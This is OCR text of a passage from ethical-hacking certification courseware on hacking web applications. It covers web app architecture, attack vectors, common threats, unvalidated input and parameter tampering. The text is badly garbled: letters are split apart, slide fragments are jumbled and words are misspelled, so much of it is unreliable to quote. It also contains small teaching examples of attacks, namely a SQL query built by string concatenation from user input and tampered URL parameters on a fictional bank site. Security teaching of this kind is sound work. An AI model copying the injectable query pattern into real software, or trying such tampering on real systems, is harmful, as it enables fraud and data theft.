CEHv8 Module 13 Hacking Web Applications Edit BCH Ok

Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications
H a c k in g W e b A p p lic a tio n s
M o d u le 13
E n g in e e re d b y H ackers. P r e s e n te d b y P ro fe s s io n a ls .
CEH
a
E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8
M o d u le 1 3 : H a c k in g W e b A p p lic a tio n s
E x a m 3 1 2 -5 0
Module 13 Page 1724 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.
S e c u r ity N e w s CEH
S e c u r i t y N e w s
X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e
S o u rce : h ttp ://w w w .d a r k re a d in g .c o m
S e c u re c lo u d h o s tin g c o m p a n y , F ire H o s t, has t o d a y a n n o u n c e d t h e fin d in g s o f
its la te s t w e b a p p lic a tio n a tta c k re p o rt, w h ic h p ro v id e s s ta tis tic a l a n a ly s is o f th e 15 m illio n
c y b e r-a tta c k s b lo c k e d b y its s e r v e r s in t h e US a n d E u r o p e d u r in g Q 3 2 0 1 2 . T h e r e p o r t lo o k s a t
a tta c k s o n t h e w e b a p p lic a t io n s , d a ta b a s e s a n d w e b s it e s o f F ire H o s t's c u s t o m e r s b e t w e e n J u ly
a n d S e p t e m b e r , a n d o f f e r s a n im p r e s s io n o f t h e c u r r e n t i n t e r n e t s e c u r it y c lim a t e as a w h o le .
A m o n g s t th e c y b e r-a tta c k s re g is te re d in t h e re p o rt, F ire H o s t c a te g o r is e s f o u r a tta c k ty p e s in
p a r tic u la r as r e p r e s e n tin g th e m o s t s e rio u s th r e a t. T h e s e a tta c k ty p e s a re am ong F ire H o s t's
,S u p e r f e c t a ' a n d t h e y c o n s i s t o f C r o s s - s i t e S c r i p t i n g ( X S S ) , D i r e c t o r y T r a v e r s a l s , S Q L I n j e c t i o n s ,
a n d C r o s s - s i t e R e q u e s t F o r g e r y (C S R F ).
O n e o f t h e m o s t s i g n i f i c a n t c h a n g e s in a t t a c k t r a f f i c s e e n b y F ir e H o s t b e t w e e n Q 2 a n d Q 3 2 0 1 2
w a s a c o n s id e ra b le r is e in t h e n u m b e r o f c r o s s - s it e a t t a c k s , in p a r t i c u l a r XSS a n d CSRF a t t a c k s
rose to re p re se n t 64% o f th e g ro u p in t h e t h i r d q u a r t e r (a 2 8 % in c re a s e d p e n e t r a t i o n ) . X S S is
now th e m ost com m on a tta c k ty p e in th e S u p e rfe c ta , w ith CSRF n o w in second. F ire H o s t's
s e r v e r s b l o c k e d m o r e t h a n o n e m i l l i o n XSS a t t a c k s d u r i n g t h i s p e r i o d a lo n e , a f i g u r e w h i c h r o s e

M o d u le O b je c tiv e s CEH
J How Web Applications Work J Session M anagem ent Attack

J W eb Attack Vectors J Attack Data Connectivity
J W eb Application Threats J Attack W eb App Client
J W eb App Hacking M ethodology J Attack W eb Services
J Footprint W eb Infrastructure ■ ^ J W eb Application Hacking Tools
‫ ־‬1/
J Hacking W ebServers J C ounterm easures
J Analyze W eb Applications J W eb Application Security Tools
J Attack A uthentication Mechanism J W eb Application Firewall
J Attack A uthorization Schem es J W eb Application Pen Testing
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u l e O b j e c t i v e s
T h e m a i n o b j e c t i v e o f t h i s m o d u l e is t o s h o w t h e v a r i o u s k i n d s o f v u l n e r a b i l i t i e s t h a t
can be d is c o v e re d in w e b a p p l i c a t i o n s . T h e a t t a c k s e x p l o i t i n g t h e s e v u l n e r a b i l i t i e s a r e a ls o
h ig h lig h te d . T h e m o d u le s ta rts w it h a d e ta ile d d e s c rip tio n o f th e w e b a p p lic a tio n s . V a rio u s w e b
a p p lic a tio n th re a ts a re m e n tio n e d . The h a c k in g m e th o d o lo g y re v e a ls th e v a rio u s s te p s
i n v o l v e d in a p l a n n e d a t t a c k . T h e v a r i o u s t o o l s t h a t a t t a c k e r s u s e a r e d i s c u s s e d t o e x p l a i n t h e
w a y t h e y e x p l o i t v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s . T h e c o u n t e r m e a s u r e s t h a t c a n b e t a k e n t o
t h w a r t a n y s u c h a t t a c k s a r e a ls o h i g h l i g h t e d . S e c u r i t y t o o l s t h a t h e l p n e t w o r k a d m i n i s t r a t o r t o
m o n i t o r a n d m a n a g e t h e w e b a p p l i c a t i o n a r e d e s c r i b e d . F in a l ly w e b a p p l i c a t i o n p e n t e s t i n g is
d iscu sse d.
T h is m o d u l e f a m i l i a r i z e s y o u w i t h :

Copyright © by E & C o in a l. All Rights Reserved. Reproduction is Strictly Prohibited.
‫^־־‬ M o d u l e F l o w
W eb a p p lic a tio n s a re th e a p p lic a tio n pro g ra m s accessed o n ly w ith In te rn e t

c o n n e c t i o n e n a b l e d . T h e s e a p p l i c a t i o n s u s e H TTP as t h e i r p r i m a r y c o m m u n i c a t i o n p r o t o c o l .
G e n e ra lly , th e a tta c k e rs t a r g e t th e s e a p p s f o r s e v e ra l re a so n s. T h e y a re e x p o s e d t o v a rio u s
a tta c ks . For cle a r u n d e rs ta n d in g o f th e "h a c k in g w e b a p p lic a tio n s " w e d iv id e d th e c o n c e p t in to
v a rio u s s e c tio n s .
Q W e b A p p C o n ce p ts
Q W e b A p p T h re a ts
© H a c k in g M e t h o d o lo g y
Q W e b A p p l i c a t i o n H a c k i n g T o o ls
© C o u n te rm e a s u re s
0 S e c u rity T o o ls
© W e b A p p P en T e s t i n g
Let us b e g in w i t h t h e W e b A p p c o n c e p ts .

Web A p p lica tio n Security

CEH
Statistics
Cross-Site Scripting
Information Leakage
Copyright © by E t C t in d l . All Rights Reserved. Reproduction is Strictly Prohibited.
f f W e b A p p l i c a t i o n S e c u r i t y S t a t is t ic s
~ S ource: h tt p s : / / w w w . w h it e h a t s e c . c o m
A c c o r d i n g t o t h e W H I T E H A T s e c u r i t y w e b s i t e s t a t i s t i c s r e p o r t in 2 0 1 2 , i t is c l e a r t h a t t h e c r o s s -
s ite s c r ip tin g v u ln e r a b ilitie s a re f o u n d on m o r e w e b a p p lic a tio n s w h e n com pa re d to o th e r
v u ln e ra b ilitie s . F ro m th e g ra p h y o u c a n o b s e r v e t h a t in t h e y e a r 2 0 1 2 , c r o s s - s i t e s c r i p t i n g
v u l n e r a b i l i t i e s a r e t h e m o s t c o m m o n v u l n e r a b i l i t i e s f o u n d in 5 5 % o f t h e w e b a p p l i c a t i o n s . O n l y
1 0 % o f w e b a p p l i c a t i o n a t t a c k s a r e b a s e d o n i n s u f f i c i e n t s e s s i o n e x p i r a t i o n v u l n e r a b i l i t i e s . In
o rd e r to m in im iz e th e ris k s a s s o c i a t e d w ith c ro s s -s ite s c rip tin g v u ln e ra b ilitie s in t h e web
a p p lic a tio n s , y o u have t o a d o p t n e ce s sa ry c o u n te r m e a s u re s a g a in s t th e m .

In tr o d u c tio n to W e b A p p lic a tio n s C E H
W e b a p p lic a t io n s p r o v id e a n in t e r f a c e b e t w e e n
T h o u g h w e b a p p lic a t io n s e n fo r c e c e r ta in
e n d u s e rs a n d w e b s e rv e rs th r o u g h a s e t o f
s e c u r ity p o lic ie s , th e y a re v u ln e r a b le
w e b p a g e s t h a t a re g e n e ra te d a t t h e
t o v a r io u s a tta c k s s u c h as SQL
s e rv e r e n d o r c o n t a in s c r ip t c o d e t o
in je c tio n , c ro s s -s ite s c r ip tin g ,
b e e x e c u te d d y n a m ic a lly w it h in
s e s s io n h ija c k in g , e tc .
\
t h e c lie n t w e b b r o w s e r
* ,
W e b a p p l i c a t io n s a n d W e b 2 .0
N e w w e b te c h n o lo g ie s s u c h as
t e c h n o lo g ie s a r e i n v a r i a b l y u s e d t o
W e b 2 .0 p r o v id e m o r e a tta c k
s u p p o r t c r it ic a l b u s in e s s f u n c t i o n s
s u rfa c e f o r w e b a p p lic a t io n
s u c h a s C R M , S C M , e tc . a n d i m p r o v e
e x p lo ita tio n
b u s in e s s e f f ic ie n c y
C o p y r ig h t © b y E&C01nal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
In tr o d u c tio n to W e b A p p lic a tio n s
W e b a p p lic a tio n s are th e a p p lic a tio n th a t run on th e re m o te w e b se rve r and send th e

o u tp u t o v e r th e In te rn e t. W e b 2.0 te c h n o lo g ie s are used by all th e a p p lic a tio n s based on th e
w e b -b a se d servers such as c o m m u n ic a tio n w ith users, clie n ts, th ir d -p a rty users, etc.
A w e b a p p lic a tio n is c o m p ris e d o f m a n y layers o f fu n c tio n a lity . H o w e ve r, it is co n sid e re d a

th re e -la y e re d a rc h ite c tu re co n sistin g o f p re s e n ta tio n , logic, and data layers.
The w e b a rc h ite c tu re relies s u b s ta n tia lly on th e te c h n o lo g y p o p u la rize d by th e W o rld W id e

W e b , H y p e rte x t M a rk u p Language (HTM L), and th e p rim a ry tra n s p o rt m e d iu m , e.g. H yper Text
T ra n s fe r P ro to c o l (HTTP). HTTP is th e m e d iu m o f c o m m u n ic a tio n b e tw e e n th e se rve r and th e
c lie n t. T yp ica lly, it o p e ra te s o v e r TCP p o rt 80, b u t it m ay also c o m m u n ic a te o v e r an unused
p o rt.
W e b a p p lic a tio n s p ro v id e an in te rfa c e b e tw e e n end users and w e b servers th ro u g h a set o f

w e b pages th a t are g e n e ra te d a t th e se rve r end o r c o n ta in s c rip t code to be e xecuted
d y n a m ic a lly w ith in th e c lie n t w e b b ro w se r.
Som e o f th e p o p u la r w eb servers p re s e n t to d a y are M ic ro s o ft IIS, A pache S o ftw a re

F o u n d a tio n 's A pache HTTP Server, A O L /N e tsca p e 's E n te rp rise Server, and Sun One. Resources
are called U n ifo rm R esource Id e n tifie rs (URIs), and th e y m ay e ith e r be s ta tic pages o r c o n ta in
d y n a m ic c o n te n t. Since HTTP is stateless, e.g., th e p ro to c o l does n o t m a in ta in a session state,

W e b A p p lic a t io n C o m p o n e n ts C E H
Urtifwd itfcMjl NMhM
IS
C o p y r ig h t © b y E& C oinal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
^ W e b A p p lic a tio n C o m p o n e n ts
The c o m p o n e n ts o f w e b a p p lic a tio n s are liste d as fo llo w s
Login: M o s t o f th e w e b s ite s a llo w a u th e n tic users to access th e a p p lic a tio n by m eans o f lo gin. It
m eans th a t to access th e service o r c o n te n t o ffe re d by th e w e b a p p lic a tio n user needs to
s u b m it h is /h e r use rn a m e and passw ord. Exam ple g m a il.co m
The Web Server: It re fers to e ith e r s o ftw a re o r h a rd w a re in te n d e d to d e liv e r w e b c o n te n t th a t

can be accessed th ro u g h th e In te rn e t. An e xa m p le is th e w e b pages served to th e w e b b ro w s e r
by th e w e b server.
Session Tracking Mechanism: Each w e b a p p lic a tio n has a session tra c k in g m e ch a n ism . The
session can be tra c k e d by using cookies, URL re w ritin g , o r Secure Sockets Layer (SSL)
in fo rm a tio n .
User Permissions: W h e n yo u are n o t a llo w e d to access th e sp e cifie d w e b page in w h ic h you are

logged in w ith user p e rm issio n s, yo u m ay re d ire c t again to th e login page o r to any o th e r page.
The Application Content: It is an in te ra c tiv e p ro g ra m th a t accepts w e b re q u e sts by c lie n ts and

uses th e p a ra m e te rs th a t are se nt by th e w e b b ro w s e r fo r ca rry in g o u t c e rta in fu n c tio n s .
Data Access: U sually th e w e b pages w ill be c o n ta c tin g w ith each o th e r via a data access lib ra ry
in w h ic h all th e data b a se d e ta ils are s to re d .

H o w W e b A p p lic a t io n s W o r k C E H
ID Topic News
SE LE C T * fro m new s w h e re id = 6329
6329 Tech CNN
O u tp u t
C o p y r ig h t © b y E&C01nal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
H o w W e b A p p lic a tio n s W o rk
W h e n e v e r s o m e o n e clicks o r typ e s in th e b ro w s e r, im m e d ia te ly th e re q u e ste d w e b s ite

o r c o n te n t is d isp la ye d on th e screen o f th e c o m p u te r, b u t w h a t is th e m e chanism b e h in d this?
This is th e s te p -b y -s te p process th a t takes place once a user sends a re q u e s t fo r p a rtic u la r
c o n te n t o r a w e b s ite w h e re m u ltip le c o m p u te rs are in vo lve d .
The w e b a p p lic a tio n m o d e l is e xp la in e d in th re e layers. The firs t la ye r deals w ith th e user in p u t

th ro u g h a w e b b ro w s e r o r user in te rfa c e . The second la ye r co n ta in s JSP (Java se rvle ts) o r ASP
(A ctive S erver Pages), th e d y n a m ic c o n te n t g e n e ra tio n te c h n o lo g y to o ls , and th e last layer
c o n ta in s th e d a ta b a s e fo r s to rin g c u s to m e r data such as user nam es and passw ords, c re d it card
d e ta ils, etc. o r o th e r re la te d in fo rm a tio n .
Let's see h o w th e user trig g e rs th e in itia l re q u e s t th ro u g h th e b ro w s e r to th e w e b a p p lic a tio n

se rve r:
© First th e user ty p e s th e w e b s ite nam e o r URL in th e b ro w s e r and th e re q u e s t is sent to

th e w e b server.
© On re ce ivin g th e re q u e s t ,th e w e b s e rv e r checks th e file e xte n sio n :
© If th e user re q u e sts a s im p le w e b page w ith an HTM o r HTM L e x te n sio n , th e w e b

se rve r processes th e re q u e s t and sends th e file to th e user's b ro w s e r.

W e b A p p lic a t io n A r c h it e c t u r e C E H
y ^ l ln t e m e r N
( W eb
S e rv ic e s
Clients Business Layer
A p p lic a tio n S e rv e r
J2EE .NET COM

Business
Logic
XCode C++ COM+
Legacy Application
Data Access
P re s e n ta tio n L a y e r
‫ה‬
Firew all
Proxy Server,
H TTP R e q u e s t P arse r Cache
S e rv le t R e so u rc e A u th e n tic a t io n
C o n ta in e r H a n d le r a n d Lo gin
Copyright © by E& C oinal. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b A p p lic a tio n A r c h ite c tu r e
All w e b a p p lic a tio n s e x e cu te w ith th e help o f th e w e b b ro w s e r as a s u p p o rt c lie n t. The

w e b a p p lic a tio n s use a g ro u p o f s e rve r-sid e scrip ts (ASP, PHP, etc.) and c lie n t-s id e s c rip ts
(HTM L, JavaScript, etc.) to e x e cu te th e a p p lic a tio n . The in fo rm a tio n is p re se n te d by using th e
c lie n t-s id e s c rip t and th e h a rd w a re tasks such as s to rin g and g a th e rin g re q u ire d data by th e
s e rv e r-s id e s c rip t.
In th e fo llo w in g a rc h ite c tu re , th e c lie n ts uses d iffe re n t devices, w e b b ro w se rs, and e x te rn a l

w e b services w ith th e In te rn e t to g e t th e a p p lic a tio n e xe cu te d using d iffe re n t s c rip tin g
languages. The da ta access is h a n d le d by th e d a ta b a s e la y e r using c lo u d se rvices and a
d ataba se server.

W e b 2 . 0 A p p l i c a t i o n s C E H
C«rt1fW4 itfciul NMkM
J W e b 2 .0 re fe rs t o a n e w g e n e r a tio n o f W e b a p p lic a t io n s t h a t p r o v id e a n in f r a s t r u c t u r e f o r m o r e d y n a m ic
u s e r p a r t ic ip a tio n , s o c ia l in t e r a c t io n a n d c o lla b o r a tio n
Blogs (W o rdp ress)

Q Advanced gaming
New technologies like AJAX (Gmail, YouTube) Q

O D yn am ic as op p o s e d t o s ta tic s ite c o n te n t
M o b ile a p p lic a tio n (iP hone) O O RSS-generated syndication
Flash rich interface websites O

Social n e tw o rk in g s ites (Flickr,
O ' Facebook, d e l.c io .u s )
F ra m e w o rk s (Yahool Ul v‫ ״‬..r id'‫?»«'׳׳‬

Library, jQ u e ry ) ' Q Mash-ups (Emails, IMs, Electronic
f payment systems)
Cloud computing websites like

(amazon.com) ^
W O W ikis and o th e r c o lla b o ra tiv e a p p lica tions
Q Google Base and other free Web services

In te ra c tiv e e ncyclopedias and d ic tio n a rie s O (Google Maps)
o o
ine office software (Google Docs and Microsoft light)
Ease o f d ata c re a tio n , m o d ific a tio n , o r
d e le tio n by in d iv id u a l users
C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
W e b 2 .0 A p p lic a t io n s
W e b 2.0 re fe rs to a n e w g e n e ra tio n o f w e b a p p lic a tio n s th a t p ro v id e an in fra s tru c tu re

fo r m o re d y n a m ic user p a rtic ip a tio n , social in te ra c tio n , and c o lla b o ra tio n . It o ffe rs va rio u s
fe a tu re s such as:
© A dvan ced g am ing
© D ynam ic as oppose d to s ta tic site c o n te n t
© RSS-generated s y n d ic a tio n
© Social n e tw o rk in g sites (Flickr, Facebook, d el.cio.us)
© M ash -u ps (em ails, IM s, e le c tro n ic p a y m e n t system s)
© W ikis and o th e r c o lla b o ra tiv e a p p lic a tio n s
© G oogle Base and o th e r fre e w e b services (G oogle M aps)
© Ease o f data c re a tio n , m o d ific a tio n , o r d e le tio n by in d iv id u a l users
© O n lin e o ffic e s o ftw a re (G oogle Docs and M ic ro s o ft Light)
© In te ra c tiv e e ncyclo p e d ia s and d ic tio n a rie s
© C loud c o m p u tin g w e b s ite s such as A m a zo n .co m

V u l n e r a b i l i t y S t a c k C E H
B u s in e s s L o g ic F la w s
C u s t o m W e b A p p li c a t i o n s
B _ T e c h n ic a l V u ln e r a b i l it ie s
T h ir d P a r t y C o m p o n e n t s
E l E O p e n S o u r c e / C o m m e r c ia l
D a ta b a s e f ^ ‫־‬w r O r a c le / M y S Q L / M S SQ L
W e b S e rv e r A p a c h e / M i c r o s o f t IIS
Apache
W i n d o w s / L in u x
O p e r a t i n g S y s te m
/OSX
N e tw o rk R o u t e r / S w it c h
S e c u r it y IPS / ID S
V u ln e r a b ilit y S ta c k
if - The w e b a p p lic a tio n s are m a in ta in e d and accessed th ro u g h va rio u s levels th a t in clu d e :

c u s to m w e b a p p lic a tio n s , th ir d - p a r ty c o m p o n e n ts , databases, w e b servers, o p e ra tin g system s,
n e tw o rk s , and s e c u rity . A ll th e m e c h a n ism s o r se rvices e m p lo y e d a t each level help th e user in
o ne o r th e o th e r w a y to access th e w e b a p p lic a tio n securely. W h e n ta lk in g a b o u t w e b
a p p lic a tio n s , s e c u rity is a c ritic a l c o m p o n e n t to be co n sid e re d because w e b a p p lic a tio n s are a
m a jo r sources o f attacks. The fo llo w in g v u ln e r a b ility stack show s th e levels and th e
c o rre s p o n d in g e le m e n t/m e c h a n is m /s e rv ic e e m p lo y e d a t each level th a t m akes th e web
a p p lic a tio n s v u ln e ra b le :

W e b A t t a c k V e c t o r s C E H
A n a t t a c k v e c t o r is a p a t h o r m e a n s b y w h ic h a n a t t a c k e r c a n g a in
w a c c e s s t o c o m p u t e r o r n e t w o r k r e s o u r c e s in o r d e r t o d e liv e r a n
a t t a c k p a y lo a d o r c a u s e a m a lic io u s o u t c o m e (
A t t a c k v e c t o r s i n c lu d e p a r a m e t e r m a n i p u la t i o n , X M L p o is o n in g ,
c lie n t v a li d a t i o n , s e r v e r m i s c o n f i g u r a t io n , w e b s e r v ic e r o u t in g
is s u e s , a n d c r o s s - s it e s c r ip t in g ‫־־־‬
S e c u r ity c o n t r o ls n e e d t o b e u p d a t e d c o n t in u o u s l y a s t h e a t t a c k
v e c t o r s k e e p c h a n g in g w it h r e s p e c t t o a t a r g e t o f a t t a c k
W e b A tta c k V e c to rs
An a tta c k v e c to r is a m e th o d o f e n te rin g in to to u n a u th o riz e d system s to p e rfo rm in g

m a lic io u s a tta cks. Once th e a tta c k e r gains access in to th e system o r th e n e tw o rk he o r she
d e liv e rs an a tta c k p a y lo a d o r causes a m a lic io u s o u tc o m e . No p ro te c tio n m e th o d is c o m p le te ly
a tta c k - p r o o f as a tta c k v e c to rs keep changin g and e v o lv in g w ith n e w te c h n o lo g ic a l changes.
E xam ples o f v a rio u s ty p e s o f a tta c k v e c to rs :
© P a ra m e te r m a n ip u la tio n : P roviding th e w ro n g in p u t value to th e w e b services by th e

a tta c k e r and g a in in g th e c o n tro l o v e r th e SQL, LDAP, XPATH, and sh e ll c o m m a n d s .
W h e n th e in c o rre c t values are p ro v id e d to th e w e b services, th e n th e y becom e
v u ln e ra b le and are easily a tta c k e d by w e b a p p lic a tio n s ru n n in g w ith w e b services.
0 X M L p o is o n in g : A tta c k e rs p ro v id e m a n ip u la te d XM L d o c u m e n ts th a t w h e n e xe cu te d can
d is tu rb th e logic o f p arsing m e th o d on th e server. W h e n huge XMLs are e xe cu te d a t th e
a p p lic a tio n layer, th e n th e y can be easily be c o m p ro m is e d by th e a tta c k e r to la u n ch his
o r h e r a tta c k and g a th e r in fo rm a tio n .
© C lie n t v a lid a tio n : M o s t c lie n t-s id e v a lid a tio n has to be s u p p o rte d by se rve r-side
a u th e n tic a tio n . The AJAX ro u tin e s can be easily m a n ip u la te d , w h ic h in tu rn m akes a w a y
fo r a tta c k e rs to h a n d le SQL in je c tio n , LDAP in je c tio n , etc. and n e g o tia te th e w e b
a p p lic a tio n 's key resources.

C o p y r ig h t © b y E&Coinal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
‫^־־‬ M o d u le F lo w
W e b a p p lic a tio n s are ta rg e te d by a tta c k e rs fo r va rio u s reasons. The fir s t issue is

q u a lity o f th e source code as re la te d to s e c u rity is p o o r and a n o th e r issue is an a p p lic a tio n w ith
"c o m p le x s e tu p ." Due to th e se lo o p h o le s , a tta cke rs can easily launch a tta cks by e x p lo itin g
th e m . N o w w e w ill discuss th e th re a ts associated w ith w e b a p p lic a tio n s .
^ Web App Pen Testing Web App Concepts
m Security Tools W e b A p p T h re a ts
Jk Countermeasures e‫־־־‬s Hacking Methodology

1S >
Web Application Hacking Tools

B#

W e b A p p lic a t io n T h r e a t s 1‫־‬ C E H
UrtiM Itkml Mstkm
In f o r m a t io n B ro k e n A c c o u n t
Leakage M anagem ent
C o o k ie Im p ro p e r
P o is o n in g S to ra g e E rro r H a n d lin g
Cop> ■ight © b y E C -C a u a c il. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
W e b A p p lic a tio n T h re a ts -1
W e b a p p lic a tio n th re a ts are n o t lim ite d to a tta c k s based on URL and p o rt8 0 . D espite
using p o rts , p ro to c o ls , and th e OSI layer, th e in te g rity o f m is s io n -c ritic a l a p p lic a tio n s m u s t be
p ro te c te d fro m possible fu tu r e a ttacks. V e n d o rs who w ant to p ro te c t th e ir p ro d u c ts '
a p p lic a tio n s m u s t be able to deal w ith all m e th o d s o f a tta ck.
The v a rio u s ty p e s o f w e b a p p lic a tio n th re a ts are as fo llo w s :
C o o k ie P o is o n in g
By chan g in g th e in fo rm a tio n inside th e co o kie , a tta cke rs bypass th e a u th e n tic a tio n

process and once th e y gain c o n tro l o v e r th e n e tw o rk , th e y can e ith e r m o d ify th e
c o n te n t, use th e system fo r th e m a lic io u s a tta ck, o r ste a l in fo r m a tio n fro m th e user's system .
D ir e c to r y T r a v e r s a l
A tta c k e rs e x p lo it HTTP by using d ir e c to r y tra v e rs a l and th e y w ill be able to access

re s tric te d d ire c to rie s ; th e y exe cu te co m m a n d s o u ts id e o f th e w e b se rve r's ro o t
d ire c to ry .
U n v a lid a te d I n p u t
In o rd e r to bypass th e s e c u rity system , a tta cke rs ta m p e r w ith th e h ttp requests, URL,

headers, fo rm fie ld s, h id d e n fie ld s, q u e ry strings etc. Users' login IDs and o th e r re la te d

W e b A p p lic a t io n T h r e a t s ■ 2 C E H
P la t fo r m
E x p lo its
In s e c u r e I n s u f f ic ie n t
‫׳‬V F a ilu re t o
D ir e c t O b je c t T ra n s p o rt L a ye r R e s tr ic t U R L
v 1‫־‬
R e fe r e n c e s P r o te c tio n Access
In s e c u r e
O b fu s c a tio n
C r y p to g r a p h ic
A p p lic a tio n
S to ra g e
S e c u r ity
DMZ
M anagem ent
P r o to c o l A tta c k s
E x p lo its
U n v a lid a te d
A u t h e n t ic a t io n W e b S e rv ic e s
R e d ir e c ts a n d
H ija c k in g A tta c k s
F o rw a rd s &
S e s s io n M a lic io u s
F ix a tio n A tt a c k F ile E x e c u tio n
W e b A p p lic a tio n T h re a ts 2 ‫־‬
P la tfo r m E x p lo its
V a rio u s w e b a p p lic a tio n s are b u ilt on by using d iffe r e n t p la tfo rm s such as BEA W e b logic and
C oldFusion. Each p la tfo rm has v a rio u s v u ln e ra b ilitie s and e x p lo its associated w ith it.
in In s e c u re D ir e c t O b je c t R e fe r e n c e s
§ W h e n v a rio u s in te rn a l im p le m e n ta tio n o b je c ts such as file , d ire c to ry , database
re c o rd , o r key are exposed th ro u g h a re fe re n c e by a d e v e lo p e r, th e n th e insecure d ire c t o b je c t
re fe re n c e takes place.
For e xa m p le , w h e re a bank a c c o u n t n u m b e r is m ade a p rim a ry key, th e n th e re is a good change

it can be c o m p ro m is e d by th e a tta c k e r based on such re fe re n ce s.
In s e c u re C r y p to g r a p h ic S to ra g e
W h e n se n sitive data has been sto re d in th e database, it has to be p ro p e rly e n c ry p te d

using c ry p to g ra p h y . A fe w c ry p to g ra p h ic e n c ry p tio n m e th o d s d e ve lo p e d by d e ve lo p e rs are n o t
up to par. C ry p to g ra p h ic a lly v e ry s tro n g e n c ry p tio n m e th o d s have to be used. A t th e sam e tim e ,
care m u s t be ta k e n to s to re th e c ry p to g ra p h ic keys. If th e se keys are sto re d in insecure places,
th e n th e a tta c k e r can o b ta in th e m easily and d e c ry p t th e se n sitive data.

U n v a l i d a t e d I n p u t C E H
In p u t v a lid a tio n fla w s re fe rs to a w e b a p p lica tio n An a tta c k e r e xplo its in p u t v a lid a tio n fla w s to
v u ln e ra b ility w h e re in p u t fr o m a c lie n t is n o t p e rfo rm c ro s s -s ite s c rip tin g , b u ffe r o v e rflo w ,
v a lid a te d b e fo re being processed by w e b in je c tio n a tta cks, etc. th a t re s u lt in d ata
a p p lica tio n s and backend servers t h e f t and s y s te m m a lfu n c tio n in g
Boy.com
D a ta b a s e
• B ro w s e r in p u t n o t
• v a lid a te d by th e w e b
: a p p lic a tio n
s t r i n g s q l — ,,s e l e c t * from U s e r s
h t t p : / / ju g g y b o y . c o m /lo g in . a sp x w here
? u s e r = ja s o n s 0 p a s s = s p r x n g fie ld u s e r = ‫ " י‬+ U s e r . T e x t + ‫י יי‬
a n d p w d= ‫ ״ י‬+ P a s s w o r d .T e x t + ‫ « ! ״‬r
B ro w s e r Post R eq u e st M o d ifie d Q u e ry
U n v a lid a te d In p u t
An in p u t v a lid a tio n fla w re fe rs to a w e b a p p lic a tio n v u ln e ra b ility w h e re in p u t fro m a

c lie n t is n o t v a lid a te d b e fo re being processed by w e b a p p lic a tio n s and backend servers. Sites
tr y to p ro te c t th e m s e lv e s fro m m a lic io u s atta cks th ro u g h in p u t filtr a tio n , b u t th e re are va rio u s
m e th o d s p re v a ilin g fo r th e th e p u rp o se o f e n co d in g . M a n y h ttp in p u ts have m u ltip le fo rm a ts
th a t m ake filte rin g v e ry d iffic u lt. The ca n o n ica liza tio n m e th o d is used to s im p lify th e encodin gs
and is usefu l in a v o id in g v a rio u s v u ln e ra b le a ttacks. W e b a p p lic a tio n s use o n ly a c lie n t-s id e
m e ch a nism in in p u t v a lid a tio n and a tta cke rs can easily bypass it. In o rd e r to bypass th e s e c u rity
system , a tta c k e rs ta m p e r th e h ttp re quests, URLs, headers, fo rm fie ld s, h id d e n fie ld s, and q u e ry
strin gs. Users‫ ׳‬login IDs and o th e r re la te d data gets s to re d in th e cookies and th is becom es a
source o f a tta c k fo r in tru d e rs . A tta c k e rs ga in access to th e system s by using th e in fo rm a tio n
p re s e n t in th e cookies. V ariou s m e th o d s used by hackers are SQL in je c tio n , cross-site s c rip tin g
(XSS), b u ffe r o v e rflo w s , fo r m a t s trin g a ttacks, SQL in je c tio n , co o kie p o iso n in g , and h id d e n fie ld
m a n ip u la tio n th a t re s u lt in data t h e ft and system m a lfu n c tio n in g .

‫ו‬
P a r a m e t e r / F o r m T a m p e r in g C E H
Urtifwd tlfcxjl lUthM
J A w e b p a ra m e te r ta m p e rin g a tta ck involves th e m a n ip u la tio n o f p a ra m e te rs exchanged b e tw e e n ______ . - - .

c lie n t and se rver in o rd e r to m o d ify ap p lic a tio n data such as u ser cre d e n tia ls and p erm ission s,
price , and q u a n tity o f p ro d u c ts
J A p a ra m e te r ta m p e rin g a tta ck e x p lo its v u ln e ra b ilitie s in in te g rity and logic v a lid a tio n m echanism s
th a t m ay re s u lt in XSS, SQL in je c tio n , etc.
0 (D ® 1
| htp:/www.juggybank.com/cust.asp?profile=21&
debit=2500 < ........J■• T a m p e rin g w it h t h e |
URL p a ra m e te rs 1
0@ ® 1
| htp:/www.juggybank.com/cust.asp?profile=82&
debt=lSO
O < ........ J•■1...... .........
O t h e r p a r a m e te r s c a n
| http://w ww.juggybank.com /stat.asp?pg=531&status=view < ......... b e c h a n g e d in c lu d in g
a t t r i b u t e p a r a m e te r s
0 © ®
| http://w w w .juggybank.com /stat.asp?pg-147& status‫ ־‬delete < ••••
C o p y r ig h t © b y E&Coinal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
P a ra m e te r/F o rm T a m p e r in g
r- •‫ייי■ ח‬
P a ra m e te r ta m p e rin g is a sim p le fo rm o f a tta c k a im e d d ire c tly a t th e a p p lic a tio n 's
business logic. This a tta c k takes a d va nta ge o f th e fa c t th a t m a n y p ro g ra m m e rs re ly on h id d e n
o r fix e d fie ld s (such as a h id d e n tag in a fo rm o r a p a ra m e te r in an URL) as th e o n ly s e c u rity
m easu re fo r c e rta in o p e ra tio n s . To bypass th is s e c u rity m echanism , an a tta c k e r can change
th e se p a ra m e te rs .
D e ta ile d D e s c rip tio n
Serving th e re q u e s te d file s is th e m ain fu n c tio n o f w e b servers. D uring a w e b session,

p a ra m e te rs are exchanged b e tw e e n th e w e b b ro w s e r and th e w e b a p p lic a tio n in o rd e r
